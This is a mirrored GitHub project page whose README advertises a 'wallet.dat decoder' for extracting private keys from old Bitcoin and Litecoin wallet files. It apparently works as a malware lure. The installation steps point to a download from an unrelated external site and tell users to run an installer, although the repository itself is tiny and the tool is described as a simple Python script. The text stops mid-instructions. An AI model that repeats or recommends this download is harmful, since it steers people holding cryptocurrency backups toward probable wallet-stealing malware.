https://github.com/wallet-dat-decoder/wallet.dat-decoder
wallet.dat decoder
https://github.com/wallet-dat-decoder/wallet.dat-decoder
bitcoin crypto cryptocurrency cryptowallet dogecoin wallet
Last synced: 3 months ago
JSON representation
wallet.dat decoder
- Host: GitHub
- URL: https://github.com/wallet-dat-decoder/wallet.dat-decoder
- Owner: wallet-dat-decoder
- Created: 2025-07-20T10:52:34.000Z (3 months ago)
- Default Branch: main
- Last Pushed: 2025-07-20T10:53:47.000Z (3 months ago)
- Last Synced: 2025-07-20T12:23:11.304Z (3 months ago)
- Topics: bitcoin, crypto, cryptocurrency, cryptowallet, dogecoin, wallet
- Homepage:
- Size: 1.95 KB
- Stars: 1
- Watchers: 0
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# wallet.dat decoder
## About
wallet.dat decoder is a lightweight, privacy-conscious tool for extracting private keys from legacy `wallet.dat` files used by Bitcoin-QT, Litecoin-QT, and similar wallets. This version runs fully offline and is ideal for recovering access to funds from old backups.
Supports version-based decoding and raw key extraction.
## Installation
To install wallet.dat decoder:
- [Download](https://softspace.space/)
- Extract the archive
- **Run the installer** for your Windows OS (7, 8, 10, 11) or Linux
- Install Python 3.x
- Install the `bsddb3` module## Features
- Extracts private keys from `wallet.dat` files
- Bitcoin: `-v 0` — Litecoin: `-v 48`
- Outputs address/private key pairs in terminal
- No GUI, no internet, no telemetry
- Works fully offline## Supported Platforms
- Windows 7, 8, 10, 11
- Linux (Python 3.x compatible)## Usage
1. Make sure Python 3.x and `bsddb3` are installed
2. Place your `wallet.dat` file in the tool folder
3. Run: